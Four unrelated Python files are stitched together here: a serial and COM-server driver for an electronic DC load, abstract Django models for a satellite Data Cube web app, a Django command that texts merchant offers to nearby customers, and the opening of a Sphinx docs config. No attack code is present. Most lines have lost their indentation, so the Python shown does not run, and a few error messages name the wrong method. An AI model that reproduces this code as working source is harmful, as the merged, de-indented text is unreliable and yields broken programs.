B = self.DecodeInteger(response[9:13])
B_timer_ms = self.DecodeInteger(response[13:15])
operation = self.DecodeInteger(response[15])
time_const = 1e3
transient_operations_inv = {0:"continuous", 1:"pulse", 2:"toggled"}
if mode.lower() == "cc":
return str((A/self.convert_current, A_timer_ms/time_const,
B/self.convert_current, B_timer_ms/time_const,
transient_operations_inv[operation]))
elif mode.lower() == "cv":
return str((A/self.convert_voltage, A_timer_ms/time_const,
B/self.convert_voltage, B_timer_ms/time_const,
transient_operations_inv[operation]))
elif mode.lower() == "cw":
return str((A/self.convert_power, A_timer_ms/time_const,
B/self.convert_power, B_timer_ms/time_const,
transient_operations_inv[operation]))
else:
return str((A/self.convert_resistance, A_timer_ms/time_const,
B/self.convert_resistance, B_timer_ms/time_const,
transient_operations_inv[operation]))
def SetBatteryTestVoltage(self, min_voltage):
"Sets the battery test voltage"
msg = "Set battery test voltage"
return self.SendIntegerToLoad(0x4E, min_voltage*self.convert_voltage, msg, num_bytes=4)
def GetBatteryTestVoltage(self):
"Gets the battery test voltage"
msg = "Get battery test voltage"
return self.GetIntegerFromLoad(0x4F, msg, num_bytes=4)/self.convert_voltage
def SetLoadOnTimer(self, time_in_s):
"Sets the time in seconds that the load will be on"
msg = "Set load on timer"
return self.SendIntegerToLoad(0x50, time_in_s, msg, num_bytes=2)
def GetLoadOnTimer(self):
"Gets the time in seconds that the load will be on"
msg = "Get load on timer"
return self.GetIntegerFromLoad(0x51, msg, num_bytes=2)
def SetLoadOnTimerState(self, enabled=0):
"Enables or disables the load on timer state"
msg = "Set load on timer state"
        #0x52 sets the timer state (0x50, used above, sets the timer value)
        return self.SendIntegerToLoad(0x52, enabled, msg, num_bytes=1)
def GetLoadOnTimerState(self):
"Gets the load on timer state"
msg = "Get load on timer"
state = self.GetIntegerFromLoad(0x53, msg, num_bytes=1)
if state == 0:
return "disabled"
else:
return "enabled"
def SetCommunicationAddress(self, address=0):
'''Sets the communication address. Note: this feature is
not currently supported. The communication address should always
be set to 0.
'''
msg = "Set communication address"
return self.SendIntegerToLoad(0x54, address, msg, num_bytes=1)
def EnableLocalControl(self):
"Enable local control (i.e., key presses work) of the load"
msg = "Enable local control"
enabled = 1
return self.SendIntegerToLoad(0x55, enabled, msg, num_bytes=1)
def DisableLocalControl(self):
"Disable local control of the load"
msg = "Disable local control"
disabled = 0
return self.SendIntegerToLoad(0x55, disabled, msg, num_bytes=1)
def SetRemoteSense(self, enabled=0):
"Enable or disable remote sensing"
msg = "Set remote sense"
return self.SendIntegerToLoad(0x56, enabled, msg, num_bytes=1)
def GetRemoteSense(self):
"Get the state of remote sensing"
msg = "Get remote sense"
return self.GetIntegerFromLoad(0x57, msg, num_bytes=1)
def SetTriggerSource(self, source="immediate"):
'''Set how the instrument will be triggered.
"immediate" means triggered from the front panel.
"external" means triggered by a TTL signal on the rear panel.
"bus" means a software trigger (see TriggerLoad()).
'''
trigger = {"immediate":0, "external":1, "bus":2}
if source not in trigger:
raise Exception("Trigger type %s not recognized" % source)
msg = "Set trigger type"
        #0x58 sets the trigger source (0x54 is the communication address opcode)
        return self.SendIntegerToLoad(0x58, trigger[source], msg, num_bytes=1)
def GetTriggerSource(self):
"Get how the instrument will be triggered"
msg = "Get trigger source"
t = self.GetIntegerFromLoad(0x59, msg, num_bytes=1)
trigger_inv = {0:"immediate", 1:"external", 2:"bus"}
return trigger_inv[t]
def TriggerLoad(self):
'''Provide a software trigger. This is only of use when the trigger
mode is set to "bus".
'''
cmd = self.StartCommand(0x5A)
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Trigger load (trigger = bus)")
return self.ResponseStatus(response)
def SaveSettings(self, register=0):
"Save instrument settings to a register"
assert(self.lowest_register <= register <= self.highest_register)
msg = "Save to register %d" % register
return self.SendIntegerToLoad(0x5B, register, msg, num_bytes=1)
def RecallSettings(self, register=0):
"Restore instrument settings from a register"
assert(self.lowest_register <= register <= self.highest_register)
cmd = self.GetCommand(0x5C, register, num_bytes=1)
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Recall register %d" % register)
return self.ResponseStatus(response)
def SetFunction(self, function="fixed"):
'''Set the function (type of operation) of the load.
function is one of "fixed", "short", "transient", or "battery".
Note "list" is intentionally left out for now.
'''
msg = "Set function to %s" % function
functions = {"fixed":0, "short":1, "transient":2, "battery":4}
return self.SendIntegerToLoad(0x5D, functions[function], msg, num_bytes=1)
def GetFunction(self):
"Get the function (type of operation) of the load"
msg = "Get function"
fn = self.GetIntegerFromLoad(0x5E, msg, num_bytes=1)
functions_inv = {0:"fixed", 1:"short", 2:"transient", 4:"battery"}
return functions_inv[fn]
def GetInputValues(self):
'''Returns voltage in V, current in A, and power in W, op_state byte,
and demand_state byte.
'''
cmd = self.StartCommand(0x5F)
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Get input values")
voltage = self.DecodeInteger(response[3:7])/self.convert_voltage
current = self.DecodeInteger(response[7:11])/self.convert_current
power = self.DecodeInteger(response[11:15])/self.convert_power
op_state = hex(self.DecodeInteger(response[15]))
demand_state = hex(self.DecodeInteger(response[16:18]))
s = [str(voltage) + " V", str(current) + " A", str(power) + " W", str(op_state), str(demand_state)]
return join(s, "\t")
# Returns model number, serial number, and firmware version number
def GetProductInformation(self):
"Returns model number, serial number, and firmware version"
cmd = self.StartCommand(0x6A)
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Get product info")
model = response[3:8]
fw = hex(ord(response[9]))[2:] + "."
fw += hex(ord(response[8]))[2:]
serial_number = response[10:20]
return join((str(model), str(serial_number), str(fw)), "\t")
def ClosePort(self):
self.sp.close()
def Register(pyclass=DCLoad):
from win32com.server.register import UseCommandLine
UseCommandLine(pyclass)
def Unregister(classid=DCLoad._reg_clsid_):
from win32com.server.register import UnregisterServer
UnregisterServer(classid)
# Run this script to register the COM server. Use the command line
# argument --unregister to unregister the server.
if __name__ == '__main__':
Register()
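# Interactive usage sketch (the port name and values are hypothetical; adjust
# for your serial adapter and instrument):
#   load = DCLoad()
#   load.Initialize("COM1", 38400)
#   load.SetRemoteControl()
#   load.SetMode("cc")
#   load.SetCCCurrent(1.5)
#   load.TurnLoadOn()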
|
|
# Copyright 2016 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. All Rights Reserved.
#
# Portion of this code is Copyright Geoscience Australia, Licensed under the
# Apache License, Version 2.0 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of the License
# at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# The CEOS 2 platform is licensed under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.db import models
from django.core.exceptions import ValidationError
from django.conf import settings
import datetime
from django.utils import timezone
import pytz
import uuid
import os
class Query(models.Model):
"""Base Query model meant to be inherited by a TaskClass
Serves as the base of all algorithm query, containing some basic metadata
such as title, description, and self timing functionality.
Additionally, basic time, latitude, and longitude ranges are provided
along with platform/product used for querying the Data Cube.
Constraints:
All fields excluding primary key are unique together.
No fields are optional - defaults are provided only in specific fields
Usage:
In each app, subclass Query and add all fields (if desired).
Subclass Meta and add the newly added fields (if any) to the list of
unique_together fields in the meta class. e.g.
class AppQuery(Query):
sample_field = models.CharField(max_length=100)
class Meta(Query.Meta):
unique_together = (('satellite', 'area_id', 'product', 'time_start', 'time_end', 'latitude_max', 'latitude_min',
'longitude_max', 'longitude_min', 'sample_field'))
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True)
title = models.CharField(max_length=100)
description = models.CharField(max_length=10000)
    execution_start = models.DateTimeField('execution_start', default=timezone.now)
    execution_end = models.DateTimeField('execution_end', default=timezone.now)
area_id = models.CharField(max_length=100)
satellite = models.ForeignKey('dc_algorithm.Satellite')
time_start = models.DateField('time_start')
time_end = models.DateField('time_end')
latitude_min = models.FloatField()
latitude_max = models.FloatField()
longitude_min = models.FloatField()
longitude_max = models.FloatField()
pixel_drill_task = models.BooleanField(default=False)
    #False by default; the only valid transition is False -> True
complete = models.BooleanField(default=False)
config_path = '/app/config/datacube.conf'
class Meta:
abstract = True
unique_together = (('satellite', 'area_id', 'time_start', 'time_end', 'latitude_max', 'latitude_min',
'longitude_max', 'longitude_min', 'title', 'description'))
def __str__(self):
return str(self.pk)
def get_unique_fields_as_list(self):
return [getattr(self, field) for field in self._meta.unique_together[0]]
def update_status(self, status, message):
self.status = status
self.message = message
self.save()
def get_temp_path(self):
"""Gets a temp path for the task created by concatenating the base_result_dir, temp, and the pk."""
if not self.base_result_dir:
raise NotImplementedError("You must define 'base_result_dir' in the inheriting class.")
temp_dir = os.path.join(self.base_result_dir, 'temp', str(self.pk))
try:
os.makedirs(temp_dir)
except OSError:
pass
return temp_dir
def get_result_path(self):
"""Get the result directory for the task from base_result_dir and the pk"""
if not self.base_result_dir:
raise NotImplementedError("You must define 'base_result_dir' in the inheriting class.")
result_dir = os.path.join(self.base_result_dir, str(self.pk))
try:
os.makedirs(result_dir)
except OSError:
pass
return result_dir
def update_bounds_from_dataset(self, dataset):
self.latitude_min = min(dataset.latitude)
self.latitude_max = max(dataset.latitude)
self.longitude_min = min(dataset.longitude)
self.longitude_max = max(dataset.longitude)
self.save()
def get_chunk_size(self):
"""gets the required geographic and time chunk sizes
if there should not be chunking in a dimension, return None as the chunk size.
Geographic is in terms of degrees, time in terms of acquisitions.
Returns:
Dict containing {'geographic': float, 'time': integer}
"""
"""if not self.compositor.is_iterative():
return {'time': None, 'geographic': 0.005}
return {'time': 25, 'geographic': 0.5}"""
raise NotImplementedError("You must define 'get_reverse_time' in the inheriting class.")
def get_iterative(self):
"""defines whether or not this algorithm is iterative
        If the entire set of data over the time dimension is required, return False here.
Returns:
Boolean signifying if time should be chunked or not.
"""
#return self.compositor.id != "median_pixel"
raise NotImplementedError("You must define 'get_reverse_time' in the inheriting class.")
def get_reverse_time(self):
"""Defines whether this task is processed in reverse time order or not.
If we want scenes processed from most recent first, this will return true (e.g. most recent pixel mosaics)
else false.
Returns:
Boolean signifying whether time chunks should be processed most recent first or least recent first.
"""
#return self.compositor.id == "most_recent"
raise NotImplementedError("You must define 'get_reverse_time' in the inheriting class.")
def get_processing_method(self):
"""Map a keyword to a function used for data processing.
Maps some number of keywords that exist on the obj to methods in dc_utilities.
        For custom mosaics, we use the compositor id to distinguish the type of mosaic.
"""
"""processing_methods = {
'most_recent': create_mosaic,
'least_recent': create_mosaic,
'max_ndvi': create_max_ndvi_mosaic,
'min_ndvi': create_min_ndvi_mosaic,
'median_pixel': create_median_mosaic
}
return processing_methods.get(self.compositor.id, create_mosaic)
"""
raise NotImplementedError("You must define 'get_processing_method' in the inheriting class.")
@classmethod
def get_queryset_from_history(cls, user_history, **kwargs):
"""Get a QuerySet of Query objects using the a user history queryset
User history is defined in this class and must contain task_id and should be filtered already.
The list of task ids are generated and used in a filter function on Query. Kwargs are passed directly
in to the query filter function as kwargs.
Args:
user_history: Pre filtered UserHistory queryset - must contain attr task_id
**kwargs: Any valid queryset key word arguments - common uses include complete=False, etc.
Returns:
Queryset of queries that fit the criteria and belong to the user.
"""
queryset_pks = [user_history_entry.task_id for user_history_entry in user_history]
return cls.objects.filter(pk__in=queryset_pks, **kwargs)
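    # Usage sketch (the subclass and history model names are hypothetical):
    #   history = UserHistory.objects.filter(user_id=request.user.id)
    #   running = AppQuery.get_queryset_from_history(history, complete=False)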
@classmethod
def get_or_create_query_from_post(cls, form_data, pixel_drill=False):
"""Get or create a query obj from post form data
Using a python dict formatted with post_data_to_dict, form a set of query parameters.
Any formatting of parameters should be done here - including strings to datetime.datetime,
list to strings, etc. The dict is then filtered for 'valid fields' by comparing it to
        a list of fields on this model. The query is saved in a try/except - if there is a validation error
then the query exists and should be grabbed with 'get'.
Args:
form_data: python dict containing either a single obj or a list formatted with post_data_to_dict
Returns:
Tuple containing the query model and a boolean value signifying if it was created or loaded.
"""
"""
def get_or_create_query_from_post(cls, form_data, pixel_drill=False):
query_data = form_data
query_data['title'] = "Base Query" if 'title' not in form_data or form_data['title'] == '' else form_data[
'title']
query_data['description'] = "None" if 'description' not in form_data or form_data[
'description'] == '' else form_data['description']
valid_query_fields = [field.name for field in cls._meta.get_fields()]
query_data = {key: query_data[key] for key in valid_query_fields if key in query_data}
query = cls(pixel_drill_task=pixel_drill, **query_data)
try:
query = cls.objects.get(pixel_drill_task=pixel_drill, **query_data)
return query, False
except cls.DoesNotExist:
query = cls(pixel_drill_task=pixel_drill, **query_data)
query.save()
return query, True
"""
raise NotImplementedError(
"You must define the classmethod 'get_or_create_query_from_post' in the inheriting class.")
class Metadata(models.Model):
"""Base Metadata model meant to be inherited by a TaskClass
Serves as the base of all algorithm metadata, containing basic fields such as scene
    count, pixel count, and clean pixel statistics. Comma separated fields are also used here
and zipped/fetched using the get_field_as_list function.
Constraints:
All fields excluding primary key are unique together.
all fields are optional and will be replaced with valid values when they
are generated by the task.
Usage:
In each app, subclass Metadata and add all fields (if desired).
Subclass Meta as well to ensure the class remains abstract e.g.
class AppMetadata(Metadata):
sample_field = models.CharField(max_length=100)
class Meta(Metadata.Meta):
pass
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True)
#meta attributes
pixel_count = models.IntegerField(default=0)
clean_pixel_count = models.IntegerField(default=0)
percentage_clean_pixels = models.FloatField(default=0)
# comma separated dates representing individual acquisitions
# followed by comma separated numbers representing pixels per scene.
acquisition_list = models.CharField(max_length=100000, default="")
clean_pixels_per_acquisition = models.CharField(max_length=100000, default="")
clean_pixel_percentages_per_acquisition = models.CharField(max_length=100000, default="")
zipped_metadata_fields = None
class Meta:
abstract = True
def metadata_from_dataset(self, metadata, dataset, clear_mask, parameters):
"""Generate a metadata dictionary from a dataset and a clear mask.
Converts a dataset and a clear mask into the required metadata dict
keyed by a datetime
Args:
metadata: existing metadata dict keyed by time
dataset: xarray dataset
clear_mask: boolean mask
parameters: dict of task parameters (its 'platforms' entry is used for satellite lookup)
Returns:
metadata dict keyed by datetime
"""
"""
for metadata_index, time in enumerate(dataset.time.values.astype('M8[ms]').tolist()):
clean_pixels = np.sum(clear_mask[metadata_index, :, :] == True)
if time not in metadata:
metadata[time] = {}
metadata[time]['clean_pixels'] = 0
metadata[time]['satellite'] = parameters['platforms'][np.unique(
dataset.satellite.isel(time=metadata_index).values)[0]] if np.unique(
dataset.satellite.isel(time=metadata_index).values)[0] > -1 else "NODATA"
metadata[time]['clean_pixels'] += clean_pixels
return metadata
"""
raise NotImplementedError("You must define 'metadata_from_dataset' in the inheriting class.")
def combine_metadata(self, old, new):
"""Combine metadata dicts generated by metadata_from_dataset"""
"""
for key in new:
if key in old:
old[key]['clean_pixels'] += new[key]['clean_pixels']
continue
old[key] = new[key]
return old
"""
raise NotImplementedError("You must define 'metadata_from_dataset' in the inheriting class.")
def final_metadata_from_dataset(self, dataset):
"""Generate any metadata that can be found in the final dataset"""
"""
self.pixel_count = len(dataset.latitude) * len(dataset.longitude)
self.clean_pixel_count = np.sum(dataset[list(dataset.data_vars)[0]].values != -9999)
self.percentage_clean_pixels = (self.clean_pixel_count / self.pixel_count) * 100
self.save()
"""
raise NotImplementedError("You must define 'final_metadata_from_dataset' in the inheriting class.")
def metadata_from_dict(self, metadata_dict):
"""Initialize all model values from a metadata dict generated by metadata_from_dataset"""
"""
dates = list(metadata_dict.keys())
dates.sort(reverse=True)
self.total_scenes = len(dates)
self.scenes_processed = len(dates)
self.acquisition_list = ",".join([date.strftime("%m/%d/%Y") for date in dates])
self.satellite_list = ",".join([metadata_dict[date]['satellite'] for date in dates])
self.clean_pixels_per_acquisition = ",".join([str(metadata_dict[date]['clean_pixels']) for date in dates])
self.clean_pixel_percentages_per_acquisition = ",".join(
[str((metadata_dict[date]['clean_pixels'] * 100) / self.pixel_count) for date in dates])
self.save()
"""
raise NotImplementedError("You must define 'metadata_from_dict' in the inheriting class.")
def _get_field_as_list(self, field_name):
"""Convert comma seperated strings into lists
Certain metadata fields are stored as comma seperated lists of properties.
Use this function to get the string, split on comma, and return the result.
Args:
field_name: field name as a string that should be converted
Returns:
List of attributes
"""
return getattr(self, field_name).rstrip(',').split(',')
def get_zipped_fields_as_list(self):
"""Creates a zipped iterable comprised of all the fields in self.zipped_metadata_fields
Using _get_field_as_list, converts the comma separated fields named in
self.zipped_metadata_fields and zips them for iteration. Used to display grouped
metadata, generally by acquisition date.
Returns:
zipped iterable containing grouped fields generated using _get_field_as_list
"""
if self.zipped_metadata_fields is None:
raise NotImplementedError("You must define zipped_metadata_fields in all classes that extend Metadata.")
fields_as_lists = [self._get_field_as_list(field) for field in self.zipped_metadata_fields]
return zip(*fields_as_lists)
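# Illustrative sketch (hypothetical subclass and values): an app-level Metadata that sets
#
#     zipped_metadata_fields = ['acquisition_list', 'clean_pixels_per_acquisition']
#
# would get one tuple per acquisition from get_zipped_fields_as_list(), e.g.
# ('01/15/2017', '1024'), ready to be rendered as rows of a metadata table.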
class Result(models.Model):
"""Base Result model meant to be inherited by a TaskClass
Serves as the base of all algorithm results, containing a status, number of scenes
processed and total scenes (to generate progress bar), and a result path.
The result path is required and is the path to the result that should be the
*Default* result shown on the UI map. Other results can be added in subclasses.
Constraints:
result_path is required and must lead to an image that serves as the default result
to be displayed to the user.
Usage:
In each app, subclass Result and add all fields (if desired).
Subclass Meta as well to ensure the class remains abstract e.g.
class AppResult(Result):
sample_field = models.CharField(max_length=100)
class Meta(Result.Meta):
pass
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True)
#either OK or ERROR or WAIT
status = models.CharField(max_length=100, default="")
#used to pass messages to the user.
message = models.CharField(max_length=100, default="")
scenes_processed = models.IntegerField(default=0)
total_scenes = models.IntegerField(default=0)
#default display result.
result_path = models.CharField(max_length=250, default="")
class Meta:
abstract = True
def get_progress(self):
"""Quantify the progress of a result's processing in terms of its own attributes
Meant to return a representation of progress based on attributes set in a task.
Should be overwritten in the task if scenes processed and total scenes aren't
a useful representation
Returns:
An integer between 0 and 100
"""
total_scenes = self.total_scenes if self.total_scenes > 0 else 1
percent_complete = self.scenes_processed / total_scenes
rounded_int = round(percent_complete * 100)
clamped_int = max(0, min(rounded_int, 100))
return clamped_int
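# Worked example (assuming Python 3 true division): 7 of 20 scenes processed ->
# round((7 / 20) * 100) = 35, clamped to the range [0, 100].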
class GenericTask(Query, Metadata, Result):
"""Serves as the model for an algorithm task containing a Query, Metadata, and Result
The generic task should be implemented by each application. Each app should subclass
Query, Result, and Metadata, adding all desired fields according to docstrings. The
app should then include an AppTask implementation that ties them all together:
class CustomMosaicTask(CustomMosaicQuery, CustomMosaicMetadata, CustomMosaicResult):
pass
This Generic task should not be subclassed and should be used only as a model for how
things should be tied together at the app level.
Constraints:
Should subclass Query, Metadata, and Result (or a subclass of each)
Should be used for all processing and be passed using a uuid pk
Attributes should NOT be added to this class - add them to the inherited classes
"""
class Meta:
abstract = True
class ResultType(models.Model):
"""Stores a result type for an app that relates to options in the celery tasks
Contains a satellite id, result id, and result type for differentiating between different
result types. The result type should be displayed on the UI, passing the id as form data.
The id should be handled directly in the celery task execution. This should be inherited at the
app level without inheriting meta - the resulting class should not be abstract.
Constraints:
None yet.
"""
result_id = models.CharField(max_length=25, unique=True)
name = models.CharField(max_length=25)
class Meta:
abstract = True
def __str__(self):
return self.name
class AnimationType(models.Model):
"""
Stores a single instance of an animation type. Includes a human readable name, id, data variable and band.
These correspond to the datatypes and bands found in tasks.py for the animation enabled apps.
Used to populate UI forms.
Band number and data variable are interpreted at the app level in tasks.py.
"""
animation_id = models.CharField(max_length=25, default="None", unique=True)
name = models.CharField(max_length=25, default="None")
data_variable = models.CharField(max_length=25, default="None")
def __str__(self):
return self.name
class Meta:
abstract = True
class ToolInfo(models.Model):
"""Model used to handle the region selection page information and images.
Stores images and information for the region selection page for each tool. Information includes
the descriptions seen on the page as well as their respective images. For instance, if we want
three images to scroll across the carousel, we would create three ToolInfo instances each with
an image and description.
Attributes:
image_path: path to the banner image that is to be shown on the top of the page
image_title: title describing the image - will be displayed on page.
image_description: description text for the image. Will be displayed on page.
"""
image_path = models.CharField(max_length=100)
image_title = models.CharField(max_length=50)
image_description = models.CharField(max_length=500)
class Meta:
abstract = True
def __str__(self):
return self.image_title
class UserHistory(models.Model):
"""Contains the task history for a given user.
This should act as a linking table between a user and their tasks.
When a new task is submitted, a row should be created linking the user
to the task by id.
Constraints:
user_id should map to a user's id.
task_id should map to the pk of a task
"""
user_id = models.IntegerField()
task_id = models.UUIDField()
class Meta:
abstract = True
|
|
from django.core.management.base import NoArgsCommand
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext, string_concat
from django.conf import settings
from googlevoice.util import ValidationError
from shoppleyuser.models import *
from offer.models import *
from shoppleyuser.utils import sms_notify
from offer.utils import TxtTemplates
# stdlib imports used by the distribution logic below (target sampling and expiration times)
import random
from datetime import datetime, timedelta
SMS_DEBUG = settings.SMS_DEBUG
RADIUS = settings.DEFAULT_RADIUS
class Command(NoArgsCommand):
help = 'Distributes the offers strategically.'
DEBUG = False
def notify(self, phone, msg):
if SMS_DEBUG:
print _("\"%(msg)s\" sent to %(phone)s") % {"msg":msg, "phone":phone,}
else:
return sms_notify(phone,msg)
def handle_noargs(self, **options):
"""
read all the offers that have not been distributed, find target users for
each offer, and control how many offers an individual gets
"""
t = TxtTemplates()
#####################################
# process offer distribute
#####################################
process_areas = Offer.objects.filter(is_processing=True).values('merchant__zipcode').distinct()
black_words = BlackListWord.objects.all().values_list('word', flat=True)
# for each area
for z in process_areas:
# for each offer in current area
for o in Offer.objects.filter(merchant__zipcode=z['merchant__zipcode'], is_processing=True):
"""
# check if merchant has enough credits
"""
print "processing: ", o
from worldbank.models import Transaction
allowed_number = int(o.merchant.balance / abs(Transaction.points_table["MOD"]))
#print "balance=" ,self.merchant.balance
#print "allowed_number", allowed_number
if allowed_number == 0:
# if there isn't enough balance
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["OFFER_NOTENOUGH_BALANCE"], {"points":o.merchant.balance})
o.is_processing = False
o.save()
o.delete()
continue
"""
# check if offer has words in the black list
"""
blacked = set(o.title.lower().split()).intersection(black_words)
if len(blacked) == 0:
# if valid content
"""
# select target size
"""
target_size = 20 if allowed_number > 20 else allowed_number
# TODO: need to select 80% of followers and 20% of non-followers
target_list = []
# divide up user base in this area and distribute
users=o.merchant.get_active_customers_miles(RADIUS)
num_users = len(users)
if num_users > target_size:
target_list = random.sample(users, target_size)
elif num_users > 0:
target_list = list(users)
else:
# no target users that have not received offer
# select users again among those previously received but haven't
# filled their quota
users=Customer.objects.filter(verified=True, active=True, zipcode=z['merchant__zipcode']).values_list('pk', flat=True)
num_users = users.count()
if num_users > target_size:
target_list = random.sample(users, target_size)
elif num_users > 0:
target_list = list(users)
print "target", target_list
# distribute offer: generate offer codes
sentto = o.gen_offer_codes(Customer.objects.filter(pk__in=target_list))
print "sentto:" , sentto
#print "count=" , self.offercode_set.all().count()
for c in o.offercode_set.all():
offer_msg = t.render(TxtTemplates.templates["CUSTOMER"]["OFFER_RECEIVED"],{ "merchant":o.merchant.business_name, "title":o.title, "code":c.code })
#print c.customer.customerphone.number, offer_msg
success = self.notify(c.customer.customerphone.number, offer_msg)
if success :
transaction = Transaction.objects.create(time_stamp=datetime.now(),
offer = o,
offercode = c,
dst = o.merchant,
ttype = "MOD")
transaction.execute()
if sentto==0 :
# no customers
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["OFFER_NO_CUSTOMER"], {"code":o.gen_tracking_code()})
else:
"""
# successfully sent offers
"""
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["OFFER_SUCCESS"], {
"time": pretty_datetime(o.time_stamp),
"offer": o,
"number": sentto,
"code": o.gen_tracking_code(),
})
else:
"""
# black list the offer
"""
bo = BlackListOffer(offer=o)
bo.save()
for b_word in blacked:
bo.words.add(BlackListWord.objects.get(word=b_word))
bo.save()
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["OFFER_BLACKLIST"], { "unacceptable": ','.join(blacked)
})
if o.starter_phone:
self.notify(o.starter_phone.number, receipt_msg)
else:
self.notify(o.merchant.phone, receipt_msg)
"""
# Update offer parameters
"""
o.num_init_sentto = sentto
o.expired_time = o.starting_time + timedelta(minutes=o.duration)
o.is_processing = False
o.save()
#####################################
# process offer redistribute
#####################################
process_areas = Offer.objects.filter(redistribute_processing=True).values('merchant__zipcode').distinct()
# for each area
for z in process_areas:
# for each offer in current area
for o in Offer.objects.filter(merchant__zipcode=z['merchant__zipcode'], redistribute_processing=True):
"""
# check if merchant has enough credits
"""
from worldbank.models import Transaction
allowed_number = int(o.merchant.balance / abs(Transaction.points_table["MOD"]))
#print "balance=" ,self.merchant.balance
#print "allowed_number", allowed_number
if allowed_number == 0:
# if there isn't enough balance
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["REOFFER_NOTENOUGH_BALANCE"], {"points":o.merchant.balance})
o.redistribute_processing = False
o.save()
continue
# customers who have received the offers
old_offercodes = o.offercode_set.all()
# extend old customers
for oc in old_offercodes:
#print "before reset" , pretty_datetime(oc.expiration_time), " duration=", self.duration
oc.expiration_time = datetime.now() + timedelta(minutes=o.duration)
#print "time added" , datetime.now() + timedelta(minutes=self.duration)
oc.save()
"""
# NOTE: not send confirmation to save txt messages
offer_msg = t.render(TxtTemplates.templates["CUSTOMER"]["REOFFER_EXTENSION"],{
"code": oc.code,
"title": self.title,
"merchant": self.merchant.business_name,
"address": self.merchant.print_address(),
"expiration": pretty_datetime(oc.expiration_time),})
self.notify(oc.customer.phone, offer_msg)
"""
old_pks = old_offercodes.values_list('customer',flat=True)
"""
# select target size
"""
target_size = 20 if allowed_number > 20 else allowed_number
# TODO: need to select 80% of followers and 20% of non-followers
target_list = []
# divide up user base in this area and distribute
users=o.merchant.get_active_customers_miles(RADIUS, old_pks)
num_users = len(users)
if num_users > target_size:
target_list = random.sample(users, target_size)
elif num_users > 0:
target_list = list(users)
else:
# no target users that have not received offer
# select users again among those previously received but haven't
# filled their quota
users=Customer.objects.exclude(pk__in=old_pks).filter(verified=True, active=True, zipcode=z['merchant__zipcode']).values_list('pk', flat=True)
num_users = users.count()
if num_users > target_size:
target_list = random.sample(users, target_size)
elif num_users > 0:
target_list = list(users)
# distribute offer
resentto = o.gen_offer_codes(Customer.objects.filter(pk__in=target_list))
#print "count=" , self.offercode_set.all().count()
for oc in o.offercode_set.filter(customer__pk__in=target_list):
oc.expiration_time = datetime.now() + timedelta(minutes=o.duration)
oc.save()
offer_msg = t.render(TxtTemplates.templates["CUSTOMER"]["REOFFER_NEWCUSTOMER_RECEIVED"],{ "merchant":o.merchant.business_name, "title":o.title, "code":oc.code })
success= self.notify(oc.customer.customerphone.number, offer_msg)
if success :
transaction = Transaction.objects.create(time_stamp=datetime.now(),
offer = o,
offercode = oc,
dst = o.merchant,
ttype = "MOD")
transaction.execute()
if resentto==0 :
# no customers
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["REOFFER_ZERO_CUSTOMER"], {"code": o.trackingcode.code})
else:
"""
# successfully sent offers
"""
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["REOFFER_SUCCESS"], {
"title" : o.title,
"resentto": resentto,
})
if o.starter_phone:
self.notify(o.starter_phone.number, receipt_msg)
else:
self.notify(o.merchant.phone, receipt_msg)
"""
# Update offer parameters
"""
#print "*************************** SENT RESEND OFFER *************************"
o.num_resent_to = resentto
o.redistribute_processing = False
o.redistributable = False
o.expired_time = datetime.now() + timedelta(minutes=o.duration)
o.save()
####################################
# process iwant requests by trying to send the request to merchants of
# category that matches the request
####################################
# for w in IWantRequest.objects.filter(processed=False):
# category = w.match_category()
# # send out the request to those stores in the category
# for m in Merchant.objects.filter(zipcode=w.customer.zipcode, categories=category):
# msg = t.render(TxtTemplates.templates["MERCHANT"]["CUSTOMER_WANTS"],
# {
# "request": w.request,
# })
# self.notify(m.phone, msg)
|
|
# -*- coding: utf-8 -*-
#
# nova documentation build configuration file, created by
# sphinx-quickstart on Sat May 1 15:17:47 2010.
#
# This file is execfile()d with the current directory set to
# its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('./'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'ext.nova_todo',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
'sphinx.ext.ifconfig',
'sphinx.ext.graphviz',
'oslo.sphinx',
]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
# Changing the path so that the Hudson build output contains GA code
# and the source docs do not contain the code so local, offline sphinx builds
# are "clean."
templates_path = []
